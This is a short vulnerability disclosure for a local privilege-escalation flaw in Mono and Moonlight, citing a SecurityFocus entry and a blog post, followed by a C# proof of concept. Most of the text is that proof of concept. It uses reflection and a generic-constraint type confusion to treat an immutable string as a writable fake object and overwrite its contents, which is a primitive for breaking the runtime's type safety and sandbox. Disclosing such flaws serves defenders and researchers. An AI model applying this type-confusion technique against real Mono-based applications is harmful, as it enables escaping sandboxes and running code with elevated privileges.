Sources: https://www.chrishowie.com/2010/11/24/mutable-strings-in-mono/
https://www.securityfocus.com/bid/45051/info
Mono and Moonlight is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer.
PoC:
using System;
using System.Reflection;
public class FakeString {
public int length;
public char start_char;
}
public class TestCase {
private static FakeString UnsafeConversion<T>(T thing)
where T : FakeString
{
return thing;
}
public static void Main() {
var a = "foo";
var b = MakeMutable(a);
Console.WriteLine(a);
b.start_char = 'b';
Console.WriteLine(a);
}
private static FakeString MakeMutable(string s)
{
var m = typeof(TestCase).GetMethod("UnsafeConversion", BindingFlags.NonPublic | BindingFlags.Static);
var m2 = m.MakeGenericMethod(typeof(string));
var d = (Func<string, FakeString>)Delegate.CreateDelegate(typeof(Func<string, FakeString>), null, m2);
return d(s);
}
}
